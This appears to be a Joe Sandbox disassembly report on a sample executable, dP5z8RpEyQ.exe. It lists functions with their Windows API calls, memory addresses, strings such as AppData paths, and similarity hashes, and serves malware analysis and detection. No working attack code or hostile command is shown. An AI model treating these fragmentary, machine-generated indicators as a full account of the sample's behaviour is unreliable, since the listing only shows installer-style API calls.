                                                                                                    • Opcode Fuzzy Hash: b5715756e82aacef9dba35480b317cef67fa4a28b9ebd8b0c2191e4f0fbd53e2
                                                                                                    • Instruction Fuzzy Hash: 20F0B432905021EBCB20BFA59D84AEFB2A5DF01319B24463FF102B61D1CB7C4E425A6E
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(FFFFFFFF,00403644,?,?,00000007,00000009,0000000B), ref: 00403818
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 2962429428-0
                                                                                                    • Opcode ID: 203254b4b952498bcfb426d07e946647441d2fe85a9017f9f34946e1d1af236a
                                                                                                    • Instruction ID: 70899941626206ae6593ea46f51f68263bc92dff29c150bed4396ff8d4ee1535
                                                                                                    • Opcode Fuzzy Hash: 203254b4b952498bcfb426d07e946647441d2fe85a9017f9f34946e1d1af236a
                                                                                                    • Instruction Fuzzy Hash: 12C0123154070496C120BF749D4F5193B94AB45335B94877DB0F5B00F0CB7C4A6A465A
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404639
                                                                                                    • SetWindowTextA.USER32(00000000,?), ref: 00404663
                                                                                                    • SHBrowseForFolderA.SHELL32(?,0079E940,?), ref: 00404714
                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 0040471F
                                                                                                    • lstrcmpiA.KERNEL32(: Completed,0079F568), ref: 00404751
                                                                                                    • lstrcatA.KERNEL32(?,: Completed), ref: 0040475D
                                                                                                    • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040476F
                                                                                                      • Part of subcall function 004057D4: GetDlgItemTextA.USER32(?,?,00000400,004047A6), ref: 004057E7
                                                                                                      • Part of subcall function 004063AF: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\dP5z8RpEyQ.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406407
                                                                                                      • Part of subcall function 004063AF: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406414
                                                                                                      • Part of subcall function 004063AF: CharNextA.USER32(?,"C:\Users\user\Desktop\dP5z8RpEyQ.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406419
                                                                                                      • Part of subcall function 004063AF: CharPrevA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406429
                                                                                                    • GetDiskFreeSpaceA.KERNEL32(0079E538,?,?,0000040F,?,0079E538,0079E538,?,00000001,0079E538,?,?,000003FB,?), ref: 0040482D
                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404848
                                                                                                      • Part of subcall function 004049A1: lstrlenA.KERNEL32(0079F568,0079F568,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048BC,000000DF,00000000,00000400,?), ref: 00404A3F
                                                                                                      • Part of subcall function 004049A1: wsprintfA.USER32 ref: 00404A47
                                                                                                      • Part of subcall function 004049A1: SetDlgItemTextA.USER32(?,0079F568), ref: 00404A5A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                    • String ID: 8y$: Completed$A$C:\Users\user\AppData\Roaming\skittaget\lektier$Haste.n$
                                                                                                    • API String ID: 2624150263-3862961308
                                                                                                    • Opcode ID: a4aefe8a33941754a38210bdfdb67fad9402d671bf1433dcbf252a6a4ee896ac
                                                                                                    • Instruction ID: 0969ed353920fe7c0c653b0854d10b45f8508fdea16f9d8b9f06e94c3a270cc6
                                                                                                    • Opcode Fuzzy Hash: a4aefe8a33941754a38210bdfdb67fad9402d671bf1433dcbf252a6a4ee896ac
                                                                                                    • Instruction Fuzzy Hash: 80A17FB1900208ABDB11EFA5CD85AAF77B8EF85314F14843BF701B62D1D77C8A518B69
                                                                                                    APIs
                                                                                                    • DeleteFileA.KERNEL32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058C5
                                                                                                    • lstrcatA.KERNEL32(007A0570,\*.*,007A0570,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040590D
                                                                                                    • lstrcatA.KERNEL32(?,0040A014,?,007A0570,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040592E
                                                                                                    • lstrlenA.KERNEL32(?,?,0040A014,?,007A0570,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405934
                                                                                                    • FindFirstFileA.KERNEL32(007A0570,?,?,?,0040A014,?,007A0570,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405945
                                                                                                    • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004059F2
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00405A03
                                                                                                    Strings
                                                                                                    • "C:\Users\user\Desktop\dP5z8RpEyQ.exe", xrefs: 0040589C
                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004058A9
                                                                                                    • \*.*, xrefs: 00405907
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                    • String ID: "C:\Users\user\Desktop\dP5z8RpEyQ.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                    • API String ID: 2035342205-595587087
                                                                                                    • Opcode ID: 9393b2adcb6d8846d5ff8c884456c1fb2c6b7946f01c0648e6f841e18f88bca0
                                                                                                    • Instruction ID: ff286dc4e0ddd5c67b21a0dc49aadedac0e09a5b28e8edd6ac2018649726c89b
                                                                                                    • Opcode Fuzzy Hash: 9393b2adcb6d8846d5ff8c884456c1fb2c6b7946f01c0648e6f841e18f88bca0
                                                                                                    • Instruction Fuzzy Hash: 9C51B071900A04AADF21AB65CC86BBF7B68DF46724F14823BF441B51D2C73C4A82DF69
                                                                                                    APIs
                                                                                                    • CoCreateInstance.OLE32(00408418,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                                                                    Strings
                                                                                                    • C:\Users\user\AppData\Roaming\skittaget\lektier\Hemodilution, xrefs: 00402230
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharCreateInstanceMultiWide
                                                                                                    • String ID: C:\Users\user\AppData\Roaming\skittaget\lektier\Hemodilution
                                                                                                    • API String ID: 123533781-1527842708
                                                                                                    • Opcode ID: cc6f848e1b62abadab8e006f4452da0e78099bc8968069d3cce75adc38b3ee25
                                                                                                    • Instruction ID: 66478de832771c1020eecb70c9dea3013e0956f30c68bb444eb5f27a96bb8e2b
                                                                                                    • Opcode Fuzzy Hash: cc6f848e1b62abadab8e006f4452da0e78099bc8968069d3cce75adc38b3ee25
                                                                                                    • Instruction Fuzzy Hash: DC511671A00208AFCB00DFE4C988E9D7BB6FF48314F2041BAF515EB2D1DA799981CB14
                                                                                                    APIs
                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFindFirst
                                                                                                    • String ID:
                                                                                                    • API String ID: 1974802433-0
                                                                                                    • Opcode ID: 7f756400988a11a576d96bcb330f7db73c3d2f4761ae35ba5f018229d3e87ddf
                                                                                                    • Instruction ID: 501d16c749f80da14ed264ffe4d7962c3458ff385ba500142fb475b890c78c7d
                                                                                                    • Opcode Fuzzy Hash: 7f756400988a11a576d96bcb330f7db73c3d2f4761ae35ba5f018229d3e87ddf
                                                                                                    • Instruction Fuzzy Hash: E5F0A771644110DED700EB649A49AEE77689F51314F20457BF102B20C1D6B84A46972A
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404B74
                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404B81
                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000001), ref: 00404BD0
                                                                                                    • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404BE7
                                                                                                    • SetWindowLongA.USER32(?,000000FC,0040516F), ref: 00404C01
                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C13
                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C27
                                                                                                    • SendMessageA.USER32(?,00001109,00000002), ref: 00404C3D
                                                                                                    • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C49
                                                                                                    • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C59
                                                                                                    • DeleteObject.GDI32(00000110), ref: 00404C5E
                                                                                                    • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404C89
                                                                                                    • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404C95
                                                                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D2F
                                                                                                    • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D5F
                                                                                                      • Part of subcall function 0040418D: SendMessageA.USER32(00000028,?,00000001,00403FBD), ref: 0040419B
                                                                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D73
                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 00404DA1
                                                                                                    • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404DAF
                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404DBF
                                                                                                    • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EBA
                                                                                                    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F1F
                                                                                                    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F34
                                                                                                    • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F58
                                                                                                    • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F78
                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404F8D
                                                                                                    • GlobalFree.KERNEL32(?), ref: 00404F9D
                                                                                                    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405016
                                                                                                    • SendMessageA.USER32(?,00001102,?,?), ref: 004050BF
                                                                                                    • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050CE
                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004050F8
                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00405146
                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00405151
                                                                                                    • ShowWindow.USER32(00000000), ref: 00405158
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                    • String ID: $M$N
                                                                                                    • API String ID: 2564846305-813528018
                                                                                                    • Opcode ID: 90a3f73bba2d9c8e7cacb4b794b53442a440f171c96f1b4cbc8b508420429673
                                                                                                    • Instruction ID: 01e3f0ac69fe039d53c66122a0ee2819e5ae0f579c243cd3ce02c20529578500
                                                                                                    • Opcode Fuzzy Hash: 90a3f73bba2d9c8e7cacb4b794b53442a440f171c96f1b4cbc8b508420429673
                                                                                                    • Instruction Fuzzy Hash: AC025BB0900209AFDB10DFA8DD45AAE7BB5FB84354F10813AF610BA2E1D7799D52CF58
                                                                                                    APIs
                                                                                                    • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040434E
                                                                                                    • GetDlgItem.USER32(00000000,000003E8), ref: 00404362
                                                                                                    • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404380
                                                                                                    • GetSysColor.USER32(?), ref: 00404391
                                                                                                    • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043A0
                                                                                                    • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043AF
                                                                                                    • lstrlenA.KERNEL32(?), ref: 004043B2
                                                                                                    • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043C1
                                                                                                    • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043D6
                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404438
                                                                                                    • SendMessageA.USER32(00000000), ref: 0040443B
                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404466
                                                                                                    • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044A6
                                                                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 004044B5
                                                                                                    • SetCursor.USER32(00000000), ref: 004044BE
                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 004044D4
                                                                                                    • SetCursor.USER32(00000000), ref: 004044D7
                                                                                                    • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404503
                                                                                                    • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404517
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                    • String ID: : Completed$N
                                                                                                    • API String ID: 3103080414-2140067464
                                                                                                    • Opcode ID: 89bfaba4aad14bbdc3ef2aca23760d41403bea85feb245a06943091ca1e46a07
                                                                                                    • Instruction ID: 9df2d5718f770f504e0a3d1761d641f71338e4c23cddda8a7d5dd424fc5a0579
                                                                                                    • Opcode Fuzzy Hash: 89bfaba4aad14bbdc3ef2aca23760d41403bea85feb245a06943091ca1e46a07
                                                                                                    • Instruction Fuzzy Hash: 2A61B1B1A40208BFDF109F60DD45F6A3B69FB84715F10802AFB05BA2D1D7B8A951CF99
                                                                                                    APIs
                                                                                                    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                    • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                    • DrawTextA.USER32(00000000,Bysamfund,000000FF,00000010,00000820), ref: 00401156
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                    • String ID: Bysamfund$F
                                                                                                    • API String ID: 941294808-3307120823
                                                                                                    • Opcode ID: 2b80ecd39af3c7aade96203546a39d5d88e703590141695a35fb255926c22a0b
                                                                                                    • Instruction ID: 8cb536a74e8a95367a30f9a40e648d77c0c0257b52f8be6e86691cf172308c2f
                                                                                                    • Opcode Fuzzy Hash: 2b80ecd39af3c7aade96203546a39d5d88e703590141695a35fb255926c22a0b
                                                                                                    • Instruction Fuzzy Hash: 1D417B71800249AFCF058FA5DE459AF7BB9FF45314F00802AF991AA1A0C7789A55DFA4
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405ED4,?,?), ref: 00405D74
                                                                                                    • GetShortPathNameA.KERNEL32(?,007A12F8,00000400), ref: 00405D7D
                                                                                                      • Part of subcall function 00405BD2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BE2
                                                                                                      • Part of subcall function 00405BD2: lstrlenA.KERNEL32(00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C14
                                                                                                    • GetShortPathNameA.KERNEL32(?,007A16F8,00000400), ref: 00405D9A
                                                                                                    • wsprintfA.USER32 ref: 00405DB8
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,007A16F8,C0000000,00000004,007A16F8,?,?,?,?,?), ref: 00405DF3
                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E02
                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E3A
